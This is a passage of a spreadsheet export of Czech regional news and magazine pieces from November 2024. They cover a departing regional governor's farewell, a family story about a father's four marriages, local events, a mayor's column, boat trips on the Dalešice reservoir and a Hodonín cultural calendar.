úvazek. „Hledám takové řešení, abych se našemu regionu mohl věnovat. Zatím to je všechno v jednání,“ dodal k tomu pouze Schrek . Na závěr krátce bilancoval své čtyřleté období hejtmana. Pro něho nejsložitější dobou bylo, když se dlouho nedařilo vysoutěžit jihovýchodní obchvat Jihlavy . K tomu došlo navíc v době končící pandemie covidu-19. Kraj Vysočina měl navíc zablokované 2,5 miliardy korun v české pobočce ruské Sberbank kvůli ruské agresi na Ukrajině a k tomu se přidaly ještě drahé energie. Přiznal, že v té době o sobě dokonce pochyboval. Volby na Vysočině vyhrálo ANO, které vytvoří koalici se SOCDEM a SPD . Na druhém místě skončila středopravicová koalice v čele s ODS . VÍTĚZSLAV SCHREK se s novináři rozloučil na tiskové konferenci přípitkem nealkoholického vína . Foto: Pavel Bajer Autor: Pavel Bajer Jihlava Autor Pavel Bajer</t>
  </si>
  <si>
    <t>20241101_715_3239769999_40a1c233cff6ec229a89.html</t>
  </si>
  <si>
    <t>40a1c233cff6ec229a89</t>
  </si>
  <si>
    <t>POČTVRTÉ a naposledy?</t>
  </si>
  <si>
    <t>Shrnutí POČTVRTÉ a naposledy? Měli jsme s tátou vždy hezký vztah, i přestože byl tak trošku zvláštní a velmi nekonvenční. Už jen volbou jeho čtyř manželek, které od sebe dělilo několik desítek let. Soňa, 34 let se svým otcem se nenudí Táta se poprvé ženil, když mu bylo dvacet let, jeho nastávající pak o čtyři roky více. Kdyby Eva nebyla těhotná, nejspíš by jejich románek skončil velmi brzy, jepičí život ovšem mělo i samotné manželství. Tatínek se odmítal vzdát svobodného života, větší péči než synovi věnoval své motorce. Neuběhly ani dva roky a už se řešil rozvod, ostuda v okolí a pak taky fakt, že paní Eva měla rodinu na Slovensku , kam se také hned nato i s malým synem odstěhovala. Táta to nahlas nikdy neřekl, ale já jsem přesvědčená, že ve svých letech byl snad i rád, že mu zodpovědnost odcestovala z přímého dosahu. Se synem v občasném kontaktu byli, ten ale vyrůstal s jiným mužem daleko od nás a vztah s biologickým otcem byl vlažný a vedený spíše ze slušnosti. Možná to tak pro něj bylo dobře, nemusel díky tomu vyrůstat v takovém chaosu jako později my s bratrem. Naši mámu si tatínek bral o další dva roky později. Oba byli stejně staří, měli rovných čtyřiadvacet, tedy stejně, jako měla paní Eva, když si ji tenkrát táta bral. Rodina jim dávala víc šancí, maminku měli rádi a už jednou rozvedený Václav nutně potřeboval zklidnit v chomoutu. Manželství se zpočátku tvářilo jako pohodové. Během deseti let jsem se narodila já a můj bratr, ale ani to nezabránilo, aby se taťkovi nezačala po čase zapalovat lýtka pro mladší. Když máma zjistila, že si našel milenku, vyváděla jako smyslů zbavená, vyhrožovala, dokonce i prosila a byla by ochotná odpustit mu, jen kdyby se s tou holkou rozešel. Nebylo jí to nic platné, slečna Jarka, čtyřiadvacetiletá vysokoškolačka čerstvě po studiu, byla zvyklá užívat si života, zejména toho nočního. To nejspíš až příliš usazenému tátovi imponovalo. „Neblázni, Vašku, je mladá, ta ti uteče,“ domlouvala mu naše babička. Děda ho prý vzal na pivo a až do zavíračky se mu snažil domluvit, ať se vzpamatuje. Budiž, když musí, ať si tedy užije, ale ať do toho zbytečně nemotá city a nešlape si po štěstí. „Já si nedokážu pomoct, táto. Jarka je plná šťávy, chuti do života, s ní konečně žiju tak, jak jsem si celý život přál,“ odpověděl mu údajně táta. A to už bylo jasné, že situaci nezachrání žádný mediátor. Bylo rozhodnuto, táta se zamiloval a milé slečně Jarce imponovalo, že se o ni zajímá starší, zralý muž atraktivního vzhledu. Někdo říkal, že je zlatokopka, já si to ale nemyslím. Táta se nacházel v nejlepších letech, štramák, síly v té době měl tolik, že mohl skály lámat. Tak byla veselka. Na jejich svatbu si živě vzpomínám. Hlavně na babiččino povzdechnutí. „A nevěsta má zase čtyřiadvacet. To už je potřetí, snad konečně i naposled!“ Jarka byla moc fajn, rádi jsme k nim s bráchou jezdili na víkendy, protože s ní byla legrace. Neznala zákazy, příkazy, prohlašovala, že se sama ještě cítí jako holka a chce pro nás být spíš kamarádkou než autoritou. Jedli jsme nezdravá jídla a poznali, jaké je to chodit do restaurací, což jsme s mámou nedělali. Ta zastávala pouze domácí stravu, hodně se u nás šetřilo a myslelo na zadní vrátka, která ale v tátově trošku divoké domácnosti zůstávala stále dokořán. Zatímco my byli spokojení a k tátovi se těšili, ten po čase zažíval opravdová muka. Přidávalo tomu hlavně okolí, protože i když byli Jarka s tátou manželé, ostatní na ni pohlíželi jako na mladou fiflenu bez rodinných instinktů, příliš svobodomyslnou a lehkovážnou. Chlapi v hospodě si z táty dělali legraci, asi mu mladou ženu trošku záviděli, ale brouka do hlavy může občas člověku nasadit už jen ten kolovrátek, který stále dokola omílá vizi toho, co by se mohlo stát. A tak do domácnosti mého otce přišla žárlivost. Strach, obava, preventivní slídění, obviňování. Z lásky až za hrob a obdivu se pozvolna stávala potřeba vlastnit, mít pod kontrolou a hlavně být stále dokola ujišťován, že právě on je ten jediný na celém světě. Táta, aniž by to tušil, svým chováním překročil hranici toho, kdy ještě mohl Jarce imponovat. Stal se z něj věčně nespokojený kňučící pes, který občas chňapl, ale spíš ze strachu, než že by chtěl útočit. Stalo se, co se stát muselo, a tak byl táta ve čtyřiceti potřetí rozvedený. „Zůstal jsem pro smích celému okolí,“ stěžoval si depresivním tónem a zakuklil se do pozice ublíženého, kterého nikdo nemá rád. Litoval se. Na to období nevzpomínám ráda. Otec se neusmál, jen pořád něco kritizoval, za všechno mohli druzí a zvlášť ženy, protože když jej zradila jedna, musí být prohnilé celé plémě. Máma byla asi ráda, že táta uznal, že udělal chybu, když od nás odešel, už ale měla svůj život, nového partnera a byla tak spokojená. Táta po letech dokonce prohlásil, že Jarku si vlastně odehnal sám tím, jak se choval, muselo ale uběhnout mnoho let, než k tomu prozření došel. Namísto žen se v té době soustředil na práci. Nejprve jen za levno sháněl určité zboží z ciziny a přeprodával ho omezené sortě zákazníků u nás. Později se ale okruh zájmu lidí zvětšoval a táta si tak vytvořil velmi slušnou klientelu. Zjistil, že se mu vyplatí rozjet vlastní firmu, vytvořit si živnost a pustit se do práce ve velkém. Neměl čas na nic. Na sebe, na nás, hodně cestoval, byl věčně na počítači. Jestli měl v té době milenky? Těžko říct, ale spíš myslím, že se zamiloval do šumu bankovek, úspěchu a pozvolného zvyšování vlastního sebevědomí. Byli jsme s bráchou tak rádi, že zase začal žít. Oblékat se do slušivých košilí, vystupovat jako distingovaný muž, který má to správné charisma. Když slavil šedesátku, holky z práce podle fotek nevěřily, že mu není o deset let méně. Vypadal opravdu dobře, možná až moc. „Tenhle parfém nebude pánský, viď, tati?“ zeptala jsem se jednou, vděčná za to, že po dvaceti letech konečně zase otevřel téma ženy. Nechtěla jsem, aby zůstal na stará kolena sám, opuštěný. Volbou partnerky nám ovšem doslova vytřel zrak. „Tohle je Libuška, chodíme spolu už přes rok a je to víc než vážné,“ přiznal a ukázal nám fotografii holky, o které jsme si nejprve mysleli, že je Libuščinou dcerou. Ovšem chyba lávky, právě tahle žába byla novou přítelkyní našeho táty! „Chtěl jsem vám to říct už dávno. Mám totiž v plánu Libušku požádat o ruku. Je to úžasná žena, sebevědomá, vzdělaná, ambiciózní a přitom moc milá a hodná. Obrovským způsobem mě posunula kupředu,“ chválil si ji, zatímco my s bráchou jsme byli v nekonečných rozpacích. Novou ženu jsme tátovi přáli, ale nebylo už tohle trošku za hranou? „Kolik má roků?“ zeptala jsem se opatrně a dočkala se přesně té odpovědi, ze které mě v představách mrazilo. „Dvacet čtyři,“ nadmul se táta a já si představila všechny ty čtyřiadvacítky, které s ním za posledních čtyřicet let stály před oltářem. „Táto, neblbni, vzpomeň si, jak to bylo s Jarkou. Tohle ustojíš jen chvíli, budeš se užírat žárlivostí. A kdo ví, jestli ne oprávněnou. Jak dlouho jí můžeš v šedesáti stačit?“ Brácha byl odvážnější a řekl tátovi od plic to, co jsem si myslela i já. On se na nás ale podíval a shovívavě se pousmál. „Dnes jsem mnohem dál, děti moje. Tenkrát jsem byl ještě trdlo, mladý kluk, plný endorfinů, iluzí. Dnes chápu, že nikdo není dokonalý,“ filozofoval s přesně stejnými růžovými brýlemi, jaké měl před každou svojí svatbou. O dva měsíce později jsme seděli ve stejné obřadní místnosti, kde táta už počtvrté sliboval své navždy usměvavé, čtyřiadvacetileté snoubence. Hostů bylo o poznání méně než dřív, nechyběla ale naše babička, tátova máma. „Doufám, že tohle už je konečně opravdu naposledy,“ řekla mu po skončení obřadu a všichni okolo se zasmáli při představě, že by si snad otec chtěl celé kolečko zopakovat ještě třeba za dalších dvacet let. Jenom mě s bráchou ta představa zvláštně zamrazila. Oba jsme totiž došli ke stejnému závěru. Náš táta by toho možná byl skutečně schopen! Byli jsme v šoku, když nám táta představil svou novou nastávající ženu. V příběhu byla změněna jména. Ilustrační foto: Shutterstock</t>
  </si>
  <si>
    <t>20241101_716_3239787864_37dd1d1c70e3a2b715c5.html</t>
  </si>
  <si>
    <t>37dd1d1c70e3a2b715c5</t>
  </si>
  <si>
    <t>Listopadové akce v Bistru Dog in Dock v přístavu Baťova kanálu</t>
  </si>
  <si>
    <t>Listopadové akce v Bistru Dog in Dock v přístavu Baťova kanálu Víkendová degustace piv z Pivovaru Louka Víkend 1.–3. listopadu. V sobotu 2. listopadu od 18:00 proběhne řízená degustace šesti pivních speciálů s majitelem pivovaru Markem Hudečkem. Cena: 350 Kč. Kapacita je omezená, rezervujte si místo na telefonu 778 445 161 nebo e-mailem na apartmany@dogindock.cz. Husí hody s vínem Od 7. do 11. listopadu si užijete husí speciality, včetně večeře o čtyřech chodech v sobotu 9. listopadu od 18:00 s párováním vín. Cena: 950 Kč/osoba. Rezervace nutná na výše uvedených kontaktech. LiStOVáNí s Lukášem Hejlíkem V pondělí 25. listopadu v 18:00 přiveze Lukáš Hejlík improvizační show na motivy knihy “Gottland”. Vstupné: 185 Kč (včetně skleničky vína ). Vstupenky zakoupíte online přes QR kód. Bistro Dog in Dock je otevřeno každý den od 10 do 22 hodin, srdečně vás zveme k návštěvě, abyste si vychutnali sezónní dobroty z našeho menu. Ať už máte chuť na skvělý oběd či večeři, nebo hledáte místo k odpočinku s dobrým pitím, u nás si určitě vyberete. dogindock.cz</t>
  </si>
  <si>
    <t>20241101_717_3239786347_da7a03a74acec6c1d831.html</t>
  </si>
  <si>
    <t>da7a03a74acec6c1d831</t>
  </si>
  <si>
    <t>Stavební sezóna ve městě právě vrcholí</t>
  </si>
  <si>
    <t>Stavební sezóna ve městě právě vrcholí Rubrika: Dnes má slovo starostka Vážení čtenáři, podzimní počasí s dostatkem srážek nám v uplynulém měsíci přineslo plné košíky hub, čerstvě vyrostlé hřiby či kozáci, mnohdy jak malovaní, vybízeli nejen k utržení, ale i k pořízení krásných fotografií. I já si pár kousků „vybleskla“, abych se měla čím potěšit, až zas neporostou. Říjen byl v životě města ve znamení nejen hektických prací na investičních projektech, ale také mnoha akcí kulturních a společenských. Proběhl například 26. ročník Semilského paroháče, jehož součástí byla i velmi zdařilá premiéra dalšího z řady představení úžasného semilského ochotnického souboru Podio – tentokráte s názvem „Jak se nezbláznit“. Opět nezapomenutelný byl i vzpomínkový koncert na paní farářku Ladu Prokůpkovou. Ne všechny říjnové události však byly radostné. S obrovským zármutkem v srdci jsem přijala zprávu, že nás 13. října opustila ve věku 90 let paní režisérka Věra Plívová Šimková , čestná občanka města Semily a legenda české kinematografie. Její tvorba, s dětmi a pro děti, sepjetí s naším krajem, kterému zůstala věrna celý život, mimořádný lidský přínos – jen těžko hledám slova... Upřímnou soustrast rodině a přátelům, obrovské díky za vše, co jste pro své blízké i celou českou společnost vykonala. Paní režisérko, zůstanete v našich srdcích, děkujeme! Nejen skrze Semilské noviny se ke mně dostal podnět, za nějž chci tímto občanům poděkovat. Týká se pojmenování nově budovaného atletického stadionu po Oldřichu Kolzrtovi, čestném občanovi města. Tato myšlenka nezapadne, budeme se jí na patřičných fórech určitě zaobírat. Pojmenování ulic, prostranství či budov je však citlivé téma, vyžaduje vždy nejprve úvahy nad tím, zda je vhodné to či ono vůbec pojmenovat. Avšak naprosto se ztotožňuji s myšlenkou, že je třeba si jméno tohoto mimořádného pana učitele připomenout a ukotvit v životě našeho města. I v listopadu budou Semily společensky žít. Dovolím si například upozornit na již tradiční Burzu středních škol, skvělou příležitost k výběru budoucí školy pro žáky i rodiče, která se uskuteční 5. listopadu v Kulturním centru Golf. Naše Městská knihovna slaví neuvěřitelných 160 let a chystá pro vás úžasné akce, které volají po návštěvě. Na sobotu 30. listopadu pro vás připravujeme tradiční rozsvícení vánočního stromu, jarmarky v Muzeu a Pojizerské galerii a Waldorfské škole. Určitě se máte na co těšit! Letošní investiční akce stále běží, finišujeme. Dokončíme atletický stadion, nový most, dopravní terminál, atd. Zároveň však intenzivně připravujeme rozpočet města a jeho organizací na příští rok, plánujeme investice další. O průtahu městem a nové výjezdové základně Zdravotnické záchranné služby Libereckého kraje jsem na tomto místě již psala mnohokrát. Naše priority a cíle jsou ale mnohem širší – nové kabiny na stadionu jako důstojné zázemí pro sportovce, úprava prostranství před krematoriem v Urnovém háji, pokračování v opravách zdi hřbitova na Koštofranku, opravy Lhotecké ulice či dalších ulic v lokalitě Nad Školami, chodník do Chuchelny, cyklostezky do Slané i do Benešova , dokončení regenerací sídlišť Luční – Jižní a Řeky, kompletní rekonstrukce sídliště Na Olešce – na tyto i další akce se snažíme alokovat finanční prostředky a co nejdříve přistoupit k jejich realizaci. Vážení občané, rozmýšlela jsem, zda do úvodníku zařadit i následující řádky. Nicméně považuji za důležité vám poděkovat za účast ve volbách do krajského zastupitelstva a do Senátu Parlamentu ČR. Díky hlasům voličů v senátním obvodu č. 35 – Jablonecko jsem byla zvolena senátorkou. Děkuji z celého srdce za vyjádřenou podporu. A zde vás chci ujistit, že naše Semily zůstávají mojí prioritou. Funkci starostky budu i nadále vykonávat v plném rozsahu a nasazení, i když jako neuvolněná. Do konce roku dokončím účetní období jako předsedkyně dozorčí rady Krajské nemocnice Liberec a nebudu již tuto funkci zastávat. Stejně tak i pozici předsedkyně zastupitelského klubu hnutí Starostové pro Liberecký kraj , kterou již vykonává moje kolegyně a krajská zastupitelka. Vážení čtenáři, přeji vám pohodové podzimní dny, příroda se chystá ke svému odpočinku a nastává doba určitého zklidnění. Krajina hraje barvami a čas odpoledního zapadajícího sluníčka zve na procházky či k setkání s přáteli u skleničky dobrého vína , svařáku nebo kávy. Autor: Lena Mlejnková Autor person Lena Mlejnková Rubrika transition_slide Dnes má slovo starostka</t>
  </si>
  <si>
    <t>20241101_718_3239785994_b105dd9273ba8b32a619.html</t>
  </si>
  <si>
    <t>b105dd9273ba8b32a619</t>
  </si>
  <si>
    <t>Přijede na bílém koni? V listopadu obvykle už vyhlížíme první sněhové vločky. Bývávalo, že se objevily kolem svátku sv. Martina . Kdo ví, jak to bude letos. Každopádně se ale můžeme pokusit bílou nadílku přivolat účastí ve svatomartinském průvodu přes Karlův most . Tato připomínka starých tradic ožívá vždy 11. listopadu. Co takový svatomartinský průvod obnáší? Hlavní postavou je přirozeně svatý Martin , jedoucí na pověstném bílém koni. Světec, kdysi voják, poté kněz a nakonec biskup, přijede v oděvu římského vojáka tak, jak dle legendy daroval žebrákovi polovinu svého pláště, aby ho ochránil před zimou. Ve svatomartinském průvodu však půjde i jedenáct husopasek, které před sebou poženou jedenáct hus. I ty by mohly být považovány za symbol nadcházející zimy, jejíž chladné noci bývalo vždy nejlépe strávit pod peřinou z husího peří, a připravit se na ni dobrou husí pečínkou. Ať bude počasí jaké bude, v tomto průvodu se tradice naplní, protože setnina římských vojáků, kteří budou jeho součástí, poveze sníh na koňském povozu. K starodávné tradici svátku sv. Martina však ve 20. století přibyla ještě nová. I tu průvod připomene – a sice květem vlčího máku. Tento den, 11. listopad, se totiž zároveň připomíná i jako Den válečných veteránů. Kdo se k průvodu, přes Karlův most přidá, a dojde s ním na Křižovnické náměstí , může tu shlédnout i představení středověkého divadla, dopřát si něco ze svatomartinských dobrot, které tu bude nabízet malý trh, a svlažit hrdlo novým, svatomartinským vínem z mělnických vinic, kterému požehná velmistr Rytířského řádu Křižovníků s červenou hvězdou. A kdy že se to vše odehraje? V sobotu 11. 11. v 11 hodin, 11 minut, kdy se průvod vydá na cestu od 11. pilíře Karlova mostu.</t>
  </si>
  <si>
    <t>20241101_719_3256730860_f8bd87cc20e40fb79acf.html</t>
  </si>
  <si>
    <t>f8bd87cc20e40fb79acf</t>
  </si>
  <si>
    <t>Podzimní tenisový turnaj smíšených dvojic – sobota 21. 09. 2024</t>
  </si>
  <si>
    <t>Podzimní tenisový turnaj smíšených dvojic – sobota 21. 09. 2024 Čtyři měsíce uplynuly jako voda a vodolští tenisté se opět sešli a zorganizovali tentokrát podzimní tenisový turnaj ve spolupráci s městem Odolena Voda . Zúčastnilo se osm smíšených dvojic. Slunečné počasí jen hrálo do karet, a tak přilákalo i několik diváků. Registrace hráčů probíhala od půl deváté ráno a od devíti hodin už míčky jen lítaly. Jako novinka pro tento turnaj bylo losování spoluhráčů. Systém hry zůstal stejný čili hrál „každý s každým“. Podle výsledků pak bylo určeno první až osmé místo. Celkovými vítězi tenisového turnaje se stali Martina a Jan Vrňákovi. Druhé, také jako stříbrné místo, obsadili Áňa Helíková a Martin Míček. Třetí neboli bronzové místo si vybojoval pár Kateřina Borovičková a Luděk Třešňák. Vítězové, ale i ostatní zúčastnění získali zajímavé a hodnotné ceny. Tento turnaj byl zpestřen udělením ceny za „schytání kanára“. Také proběhla vtipná tombola na téma „Podzim života“. Po následném zakončení turnaje si účastníci mohli vychutnat vynikající osvědčený catering Štefana Helíka s gulášem. ( Pivo na osvěžení samozřejmě nesmělo chybět). Na závěr děkujeme organizátorkám Martině Řezáčové a Petře Formanové. Fota: Archiv organizátorů Autor: • Patricie Formanová Autor person Patricie Formanová</t>
  </si>
  <si>
    <t>500</t>
  </si>
  <si>
    <t>20241101_72_3264654604_7d2a90eef0ea7c8dd26d.html</t>
  </si>
  <si>
    <t>7d2a90eef0ea7c8dd26d</t>
  </si>
  <si>
    <t>Barvy podzimu si turisté na Dalešické přehradě vychutnají i z paluby lodi Skalnaté břehy zasazené do podzimních rámů z barevného listí, opuštěné pramice, kormoráni odpočívající na borovicích, pár rybářů. Takové scenerie nyní nabízí okolí Dalešické přehrady . Lidé se přírodou mohou kochat rovnou z vodní hladiny. Stačí nastoupit na výletní loď Horácko . Nádrž brázdí i na podzim a v zimě. „Příroda teď opravdu hýří všemi barvami, všechno je krásně zbarvené – od žluté, oranžové a hnědé až po tóny červené. Když do toho zasvítí i sluníčko, je to nádhera. A oproti létu je tady teď samozřejmě výrazně klidněji,“ popisuje atmosféru kolem vodního díla Milan Jahoda, dlouholetý kapitán výletní lodi Horácko . 12 fotografií Uplynulý víkend se měly konat již poslední pravidelné plavby, vzhledem k příznivé předpovědi počasí ale vyrazí loď na projížďku ještě tuto sobotu 2. listopadu. Vypluje opět z přístaviště Kramolín, a to hodinu po poledni. Do cílového Koněšína dorazí plavidlo za pětašedesát minut a po otočení se vrací zase zpět do kramolínského přístaviště. Zájemci tak mohou na palubě strávit klidně i více než dvě hodiny, anebo se svézt pouze mezi některými stanicemi na trase. Mnozí výletníci volí kombinaci chůze a plavby – nechají se třeba kousek „popovézt“ lodí a zpáteční trasu potom absolvují pěšky. Na Martina se bude na palubě otevírat víno Ani pro nadcházející podzimní a zimní období však sezona vyjížděk ještě zdaleka nekončí. Na svátek svatého Martina , tedy na pondělí 11. listopadu, je v plánu tradiční Svatomartinská plavba. „Je to akce, která se koná už dlouhé roky. Vynechali jsme snad jenom jednou, když ji nebylo možné uspořádat kvůli covidu,“ líčí kapitán. Vyjížďka, jež startuje v deset hodin ráno, je spojena s obligátním otevřením a ochutnávkou letošních mladých svěžích vín pocházejících ze Sádku, jediné vinice a vinařství na Vysočině. Otevřou je podle tradice – přesně jedenáct minut po jedenácté hodině dopolední. „Chybět nebude ani porcička netradičně upravené svatomartinské husy a mnohé další dobroty,“ popisuje Milan Jahoda. Ten se těší hlavně na přátelskou atmosféru, s níž je akce vždycky spojena, neboť na ni řada lidí míří již opakovaně. „A z mnohých návštěvníků se tak nakonec postupně stali i naši přátelé,“ usmívá se kapitán. Účast je potřeba si předem rezervovat, podle Jahody však ještě nějaká volná místa jsou. Zajímavé a netradiční zpestření konce roku Na další plavbu se mohou zájemci vydat v neděli 17. listopadu. A loď nebude zahálet ani v prosinci. Dalešice jsou přečerpávací nádrží, a hladina tak v zimě nikdy zcela nezamrzá. Horácko tudíž může přislíbit vyjížďky i na 26. prosinec, silvestr či na Nový rok. „Tyto zimní termíny si u lidí získaly oblibu. Na Štěpána už mají lidé dost cukroví, pohádek i návštěv a rádi si svátky zpestří třeba právě plavbou. A přelom roku je zase zajímavým a netradičním vstupem do dalšího období,“ shrnul Jahoda s tím, že v případě příznivého počasí není ani vyloučeno, že bude ještě nějaký další termín plaveb vypsán. Mapy poskytuje © SHOCart a přispěvatelé OpenStreetMap. Společnost SHOCart je tradiční vydavatel turistických a cykloturistických map a atlasů. Více na www.shocart.cz Výletní loď Horácko s kapacitou 115 míst vyplouvá na hladinu Dalešické přehrady celoročně. Autor: Jana Nedělková , MF DNES Z paluby výletní lodi Horácko se nyní mohou zájemci kochat podzimní přírodou okolo vodní nádrže. Autor: Jana Nedělková , MF DNES Při projížďce po přehradě mohou cestující vidět například vyhlídku na Wilsonově skále. Autor: Jana Nedělková , MF DNES Loď mimo sezonu vyplouvá z přístaviště v Kramolíně a pluje do Koněšína, kde se otáčí a míří zpět. Přistoupit ale lze i na trase. Autor: Jana Nedělková , MF DNES Barvy podzimu si turisté na Dalešické přehradě vychutnají i z paluby lodi Autor: Jana Nedělková Autor Jana Nedělková Rubrika transition_slide Jihlava - Jihlava - zprávy</t>
  </si>
  <si>
    <t>20241101_720_3272271110_0a396162f365465e74d5.html</t>
  </si>
  <si>
    <t>0a396162f365465e74d5</t>
  </si>
  <si>
    <t>NEODOLATELNÁ TEMNOTA</t>
  </si>
  <si>
    <t>20241101_721_3272265045_f77c589c53b7c0369dcc.html</t>
  </si>
  <si>
    <t>f77c589c53b7c0369dcc</t>
  </si>
  <si>
    <t>BRUTÁLNÍ VZPOMÍNKY NA DEVADESÁTKY</t>
  </si>
  <si>
    <t>20241101_722_3272262074_8ba383b37243ed764d81.html</t>
  </si>
  <si>
    <t>8ba383b37243ed764d81</t>
  </si>
  <si>
    <t>Krakov Nevynechejte Dámu s hranostajem</t>
  </si>
  <si>
    <t>20241101_723_3272278126_4291048e6979b7a15ba9.html</t>
  </si>
  <si>
    <t>4291048e6979b7a15ba9</t>
  </si>
  <si>
    <t>S HOVNEM KOLEM SVĚTA</t>
  </si>
  <si>
    <t>20241101_724_3266799259_02a08056e8a0f2815db5.html</t>
  </si>
  <si>
    <t>02a08056e8a0f2815db5</t>
  </si>
  <si>
    <t>KULTURNÍ SERVIS • VOLNÝ ČAS</t>
  </si>
  <si>
    <t>KULTURNÍ SERVIS • VOLNÝ ČAS Dům kultury Hodonín Horní Valy 3747/6, 695 01 Hodonín www.dkhodonin.eu 1. 11. 2024 | 20.00–22.00 | Dům kultury Hodonín DESmod Držitel Slovenského slavíka a legendární kapela DESmod se chystá do Hodonína ! Tak buďte u toho, protože tato rocková parta si pro vás chystá opravdu živelný večer s obrovským nábojem a energií. Vstupné 590 Kč 3. 11. 2024 | 10.00 – 11.00 | Dům kultury Hodonín Máša a Medvěd Přijďte a zažijte úžasnou muzikálovou show s vašimi oblíbenými postavičkami z pohádky Máša a Medvěd! Tato nerozlučná dvojice přichází do České republiky s úplně novým představením plným šibalství, nových písniček, a hlavně množstvím zábavy a smíchu! Vstupné 399 Kč 4. 11. 2024 | 19.00 – 20.30 | Dům kultury Hodonín V rytmu tance – talk show Martiny Viktorie Kopecké a Zbigniewa Czendlika …ona o sobě tvrdí, že je spíše introvertka, zatímco on se charakterizuje jako rozkošný rebel. On ve víře vychováván, ona si k ní našla cestu v dospělosti. Oba šli za hlasem svého srdce. Součástí pořadu je autogramiáda knih obou aktérů. Vstupné 390 Kč 5. 11. 2024 | 19.00 – 21.00 | Dům kultury Hodonín Kytice – divadelní představení Kytice Karla Jaromíra Erbena je sbírka básní inspirována z národních tradic, bájí a pověstí. Metropolitní divadlo Praha Vstupné – základní 300 Kč/ ZTP 150 Kč 7. 11. 2024 | 18.00 – 19.30 | Dům kultury Hodonín SDH – DH Bojané 35. ročník Seriálu koncertů dechových hudeb. Slavnostní koncert k 65. výročí DH Bojané. Vstupné 220 Kč 9. 11. 2024 | 7.00 – 12.00 | Masarykovo náměstí Hodonín Farmářský trh s blešákem 9. 11. 2024 | 20.00 – 02.00 | Dům kultury Hodonín Absolventský ples Střední školy průmyslové a umělecké v Hodoníně Vstupné 400 Kč 12. 11. 2024 | 10.00 – 11.00 | Dům kultury Hodonín Pyšná princezna Pohádkový muzikál pro MŠ a I. stupeň ZŠ. Vstupné 100 Kč 13. 11. | 19.00 – 20.30 | Dům kultury Hodonín Roman Horký a skupina KAMELOT Roman Horký , zpěvák, kytarista, hudební skladatel jedné z nejúspěšnější folkové a trampské hudební skupiny České a Slovenské republiky oslaví v roce 2024 v rámci celorepublikového turné významné životní jubileum 60 let. Stěžejním programem koncertu bude výběr skladeb Romana Horkého a Kamelotu z historie až po současnost. Součástí je autogramiáda Romana Horkého a členů Kamelotu po skončení koncertu. Vstupné 450 Kč 15. 11. 2024 | 20.00 – 24.00 | Dům kultury Hodonín Horkýže Slíže + Civilní obrana Horkýže Slíže a Civilní Obrana to na podzim rozjedou v Hodoníně ! Maštaľ, teda místní kulturák, vzplane 15. listopadu. 20.00 – Civilní Obrana, 21.30 – Horkýže Slíže Vstupné 550 Kč 18. 11. 2024 | 19.00 – 21.00 | Dům kultury Hodonín Fantastická žena – divadelní představení Současná komedie úspěšného kanadského autora, jejíž zápletka se točí kolem seznamu vlastností, které by měla mít ideální partnerka. Nechte se překvapit! A dejte si dobrý pozor na to, co si přejete... Hrají: Diana Šoltýsová /Patricie Pagáčová, Ondřej Volejník / Václav Krátký, Jarmil Škvrna / Adrian Jastraban Vstupné základní 380 Kč/ ZTP 190 Kč 24. 11. 2024 | 10.00 – 10.40 | Dům kultury Hodonín Divadélko babičky Běty Nedělní pohádka pro všechny děti. Hrají: Běta Švancerová, DS Svatopluk Vstupné dobrovolné 27. 11. 2024 | 19.00 – 21.00 | Dům kultury Hodonín Petr Hapka a jeho potměšilí hosté Koncert k nedožitým osmdesátinám skladatele Petra Hapky . Připomene nejen ranou písňovou tvorbu pro Hanu Hegerovou , ale také jeho spolupráci s největším tvůrčím partnerem Michalem Horáčkem. Během večera zazní i filmové melodie. Ke spolupráci jsou pozvané osobnosti, které Hapkovy písně interpretovaly v jeho posledním velkém projektu Kudykam. V alternacích vystoupí Kateřina Marie Tichá, Petra Hřebíčková , Lenka Nová, Hana Holišová , Naďa Válová , Jana Lota , Dušan Kollár , Jan Maxián , Jan Sklenář, Xavier Baumaxa a další. Zpěváky doprovodí orchestr sólistů v nastudování Petra Maláska . Vstupné 550 Kč 30. 11. 2024 | 19.30 – 02.00 | Dům kultury Hodonín Den studentstva Pořadatel akce: Studentský parlament PŘIPRAVUJEME NA PROSINEC 2024 1. 12. 2024 – 22. 12. 2024 – Vánoční trhy 1. 12. 2024 – Adventní zvonění 3. 12. 2024 – Růžové svatby – divadelní představení 10. 12. 2024 – ZUŠ Vánoční koncert 11. 12. 2024 – Lucie Bílá – Vánoční koncert 12. 12. 2024 – Taneční závěrečná 14. 12. 2024 – Nesem Vám Vánoce – průvod 17. 12. 2024 – Vánoční ozvěny ZUŠ 26. 12. 2024 – Štěpánská zábava Reprezentační ples města Hodonína Commedia dell'arte 25. 1. 2025 od 20.00 ZATRESTBAND / RICHARD KRAJČO / CM GRAJCAR a další Předprodej spuštěn 1. 11. 2024! Kino Svět Hodonín Velkomoravská 1535/9, 695 01 Hodonín tel. pokladna 601 169 169, pokladna.kino@dkhodonin.cz, www.kinosvet.eu Kino | Senior Pravidelné projekce filmů za zvýhodněnou cenu (nejen) pro seniory. Snížená cena platí bez ohledu na věk. Každou středu ve velkém i malém sále od 14.30 a 15.00. Aktuální program na internetových stránkách nebo výloze kina. Kino | Festival Malé oči 9. – 10. listopadu Vezměte své přátele, děti, rodinu a vyrazte na 11. ročník dětského filmového festivalu Malé oči. Letos budou malé divačky a diváci pod dohledem Strážců světů. Program nabídne projekce snímků jak pro mladší děti (od 5 let), tak pro starší (od 10 let). 9.11. 13.30 | Dílny analogového fotografického obrazu bez kamery | ve foyer kina 14.30 | Kamarádi z Papuchalkovy skály| chytrý animák pro nejmenší i jejich rodiče 15.00 | Mavka: Strážkyně lesa | dobrodružný folklorní animovaný film 16.30 | WALL-E | kultovní pohádka od studia Pixar 10.11. 14.30 | Ponjo z útesu nad mořem | anime z dílny studia Ghibli 15.00 | Zataženo, občas trakaře | inteligentní animák pro celou rodinu Kino | Událost Premiérové záznamy divadelních her, speciální projekce, besedy a další Hamletův motiv | NT Live 13. listopadu | 17.00 Oscarový režisér Sam Mendes režíruje Marka Gatisse a Johnnyho Flynna v rolích hereckých legend Johna Gielguda a Richarda Burtona . Gladiátor 2 | předpremiéra 13. listopadu LiStOVáNí.cz: Vraždi všímavě ( Karsten Dusse ) 20. listopadu | 17.00 Další z cyklu populárních literárních večerů. Účinkují Pavel Oubram , Tomáš Drápela a Jakub Koudela. Tady Vary 3 | Emilia Perez 20. listopadu | 19.30 Festivalový večer s předtočeným úvodem a červeným kobercem! Alenka v říši divů | Královský balet 24. listopadu | 17.00 Nová inscenace úspěšného baletu z Royal Opera House v Londýně . Africká jízda | Tomík na cestách 26. listopadu | 18.00 Cestovatelská beseda s projekcí cestopisného filmu. 